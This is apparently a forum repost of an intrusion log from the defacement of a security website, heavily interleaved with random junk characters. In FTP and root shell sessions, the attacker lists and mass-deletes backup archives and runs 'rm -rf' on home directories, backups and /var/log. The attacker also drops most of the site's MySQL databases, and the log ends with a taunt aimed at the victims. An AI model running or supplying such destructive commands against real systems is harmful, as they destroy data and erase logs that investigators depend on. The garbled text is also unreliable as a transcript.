" r$ j" f2 B# u) e7 ` I250 CWD command successful.
% E, E1 y0 @+ s; {: z3 Y' fftp> ls -la
6 S5 o7 M8 E% P' v7 B. S9 N227 Entering Passive Mode (212,254,194,163,2,189)
. n- j/ l; ~* m% K! B/ D5 U3 K150 Opening BINARY mode data connection for ‘file list’.2 C" T- Q2 R+ c: }5 D `, a2 m- V
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar; B- E v' Z+ Y& f4 x' U5 H" B
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2' j' g$ |' o" p" s, [& J
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
6 O& [) k7 F$ ]5 l6 T) m H-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar0 v+ U8 S0 X0 u5 U( J0 u
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
# f$ B: ]6 z( A, c( `# R r[snip]
1 _- E6 l1 ~4 K3 P- u226 Transfer complete.- i7 C: L2 d0 ^9 k- _
ftp> mdelete *
: Z3 l2 G' M: A5 ]ftp> ls -la
2 b" m$ c) G) h227 Entering Passive Mode (212,254,194,163,2,193)
* H3 `5 I1 D9 c# c! F6 a* ?150 Opening BINARY mode data connection for ‘file list’.! M1 |2 S/ e& z3 t. f, h* f2 P+ L
226 Transfer complete.& `3 V9 `- t, J3 M9 [2 Q$ m1 V) B
ftp>
, I, y6 V1 m! P( W- @& G& |4 O, d! @, `
sh-3.2# cd /home7 K4 [* t$ t( u6 V, D
sh-3.2# ls -la
" C5 E* t4 @8 z7 T' Z* _total 120 M' A' V) E+ F$ K/ l6 H; P
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
/ X+ Q- O$ M9 v5 A n: q9 e7 Mdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..& t" D8 U8 W1 }8 {3 l( E+ E/ s
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
! J" |: x8 ]: { N% _-rw——- 1 root root 8192 Jun 4 03:03 aquota.group/ ?$ ?2 e* w! @# r% g) p" \
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
# q' Z, g D1 ]1 pdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet% d- s" K9 C" _
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup5 F' P+ \ k# O9 c
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
. U( @- S" M7 y6 `drwx–x–x 10 com com 4096 Apr 28 12:40 com$ Z1 j6 j8 j% m9 Z. ]9 X; ?* B
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
/ N: j4 E2 q1 r: M0 Bdrwx—— 3 jon jon 4096 Sep 21 2007 jon+ c7 Z" _) J( _$ u3 r
drwx—— 2 root root 16384 Sep 11 2007 lost+found5 ?) O; `' s) B$ t4 }' Q+ e' F& z# K
drwxr-xr-x 2 root root 4096 Sep 14 2007 my; |$ V% \* s3 L" b( J
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
0 A5 M& D9 }4 ~drwx—— 2 jon jon 4096 Sep 15 2007 test
. Q) n W/ Q8 E: d0 zdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp: e" g# O* q6 y) {5 Y
2 z% h3 R( [; U8 j: vsh-3.2# rm -rf backup/
$ h" |0 m! P7 {0 ]9 p; ] w* e. qsh-3.2# rm -rf backup.14161/) {/ W0 Q* T; h8 F4 p' \
sh-3.2# rm -rf ftp/# \& D+ C5 q: Q
sh-3.2# rm -rf jon/0 s; \' G6 t) {, V, S
sh-3.2# rm -rf my/; v. ~# `, Z q2 |; g: w
sh-3.2# rm -rf mysqldata/2 J. ^8 K0 {1 d) Y: {- P2 G- H, D
sh-3.2# rm -rf test/
, k7 [2 S7 w8 O" |( t9 f7 _# Esh-3.2# rm -rf tmp/
, v6 T& V1 @ C6 ?! \- X, hsh-3.2# cd ~9 B. x; O& V9 H e \
sh-3.2# rm -rf *0 T2 a* n7 z/ l7 Y j
sh-3.2# rm -rf /var/log/& L4 g% B( h2 }' F0 H6 |$ a
rm: cannot remove directory `/var/log//proftpd’: Directory not empty
# B: o7 `: r: Osh-3.2# rm -rf /home/*0 g/ Z3 o7 h1 N f! [1 ~
sh-3.2# mysql
: Y2 S2 ^; Y7 jWelcome to the MySQL monitor. Commands end with ; or \g.
8 P; G1 W% s Q' o- ]+ |7 kYour MySQL connection id is 407156/ o' D3 z+ H$ x
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
* z. ?* K* Y6 p- t) C& A
4 D. h3 i& R- J) U! hType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
( x) [: l7 y, k( V( q. ?2 x+ I- P$ T( ^
mysql> show databases;' [+ k' i8 e5 W
+———————–+! B0 j5 d, @; m
| Database |
- \: B+ p V2 V" X7 E7 }8 O$ {6 [+———————–+
. k* d* B5 B0 u| information_schema |
3 J9 T# y7 u# }" Y8 v% N| astanet_ads |- o+ N6 _) i7 M3 a, W/ H; r7 R
| astanet_mailing_lists |, [+ F6 j |$ e8 o6 h
| astanet_mediawiki |
; l+ j$ M: P7 z+ K! ?. G| astanet_membersystem |) f: ]) P3 k1 H7 O6 X/ O4 a+ Y
| com_contrexx |
x. e9 U0 O1 A| com_contrexx2 |! O S, r* Q0 m
| com_contrexx2_live |
, Y" D# U$ d5 K7 k) y4 I) Q( g| da_roundcube |
! c& Q$ i. @2 N* T+ `| dolphin |
" I1 i2 ] U4 X9 j| ideapool |' h3 V- I+ P4 S; m4 ?
| mysql |4 i0 n: |6 [5 k+ W' t' W' B0 _
| test |7 H% V5 {3 P o# j. w* ^+ d4 m9 m
| yourmaster |9 S* n( V6 t- s: I
+———————–+
: o' g6 h0 s* e8 S8 x14 rows in set (0.03 sec)" Y5 A g, R5 y8 X0 C& L. x
4 W7 T9 F* M! H' u1 Umysql> drop database astanet_membersystem;
+ _" Y! M5 g1 m) s$ jdroQuery OK, 46 rows affected (0.81 sec)! ]( o- k+ q1 c# F: y6 I$ e
1 f$ e, o0 ^/ _5 p) Z7 v
mysql> drop database com_contrexx;- v" o1 `! x" L) w
Query OK, 211 rows affected (2.72 sec)
7 b" t- w! K# Q
/ J9 k" U2 h9 Y+ [mysql> drop database com_contrexx2;$ i# i7 Z* W& T" I
Query OK, 237 rows affected (2.23 sec)
3 q, A( m: @! X% l o" o+ B3 f& C( E: v# R$ R* S1 ]7 T0 {9 Y
mysql> drop database com_contrexx2_live;
^; k1 v, Y" ~+ U" BQuery OK, 227 rows affected (7.63 sec)
6 t& }1 z8 |( ~( ~+ Y; R3 t) t+ ~; ~$ F
mysql> drop database ideapool;
5 q- z1 k- U8 y5 p9 @Query OK, 69 rows affected (0.19 sec)
- x7 p/ F' z, K9 T1 ], {
' o. U9 `' |; c1 C" G: R2 bmysql> drop database yourmaster;
4 v) j+ i" h+ |& V+ m t- }. YQuery OK, 158 rows affected (0.55 sec)
# ^5 S/ ~ i- a$ \0 r: M: Q9 }" Y6 Q5 n+ e+ e
mysql> drop database astanet_ads;
1 ]3 i4 J+ L3 [6 }& a" _Query OK, 9 rows affected (0.11 sec)" R/ l! K# u) w. \8 E
7 X, X6 \8 f5 D% xmysql> drop database astanet_mailing_lists;8 y1 Y: h; D; ]! c$ w/ Y# ]
Query OK, 24 rows affected (1.47 sec)
, `0 n3 u, X+ \& }! p) {5 Z% {" x- D/ d7 [! F
mysql> drop database astanet_mediawiki;
) B2 e% |5 O+ y& }3 m6 nQuery OK, 31 rows affected (0.51 sec)6 G0 P9 {) e B9 T: i C
; o9 h/ d4 g5 H/ [8 w
mysql> show databases;
- E; ~% d1 t& J) m! [) O- U+——————–+% g8 a. m9 ]9 X. Y- T0 p& M& R
| Database |$ u L4 J/ I& n9 Q
+——————–+3 O6 Q0 y1 a4 ~; t6 [
| information_schema |
0 d% W3 E" }8 M. ^$ ~' r- f% g| da_roundcube |6 f! K' k* U! N' T: @
| dolphin |
5 H+ c1 Z4 S) T _4 || mysql |" E$ X$ I* H# p) Y! N
| test |5 K! g* O# `& P( r
+——————–+6 E; R k# m+ A: ~8 \( F$ p: Z
5 rows in set (0.00 sec)
# H9 x$ |; _8 V8 v5 V
7 s, f7 C. e7 i1 t$ jWhat a journey! We’re not sure exactly why the “Terminator” had any influence on
# H5 c) ~* z4 |+ ]) Atheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the O d3 M" Z2 E2 N8 B
wrong to say this pack of morons *wont be back*.$ Y% k V, D6 Y7 [* ?; j: ?
|
发表于 2012-11-6 21:07:34
收藏
支持
反对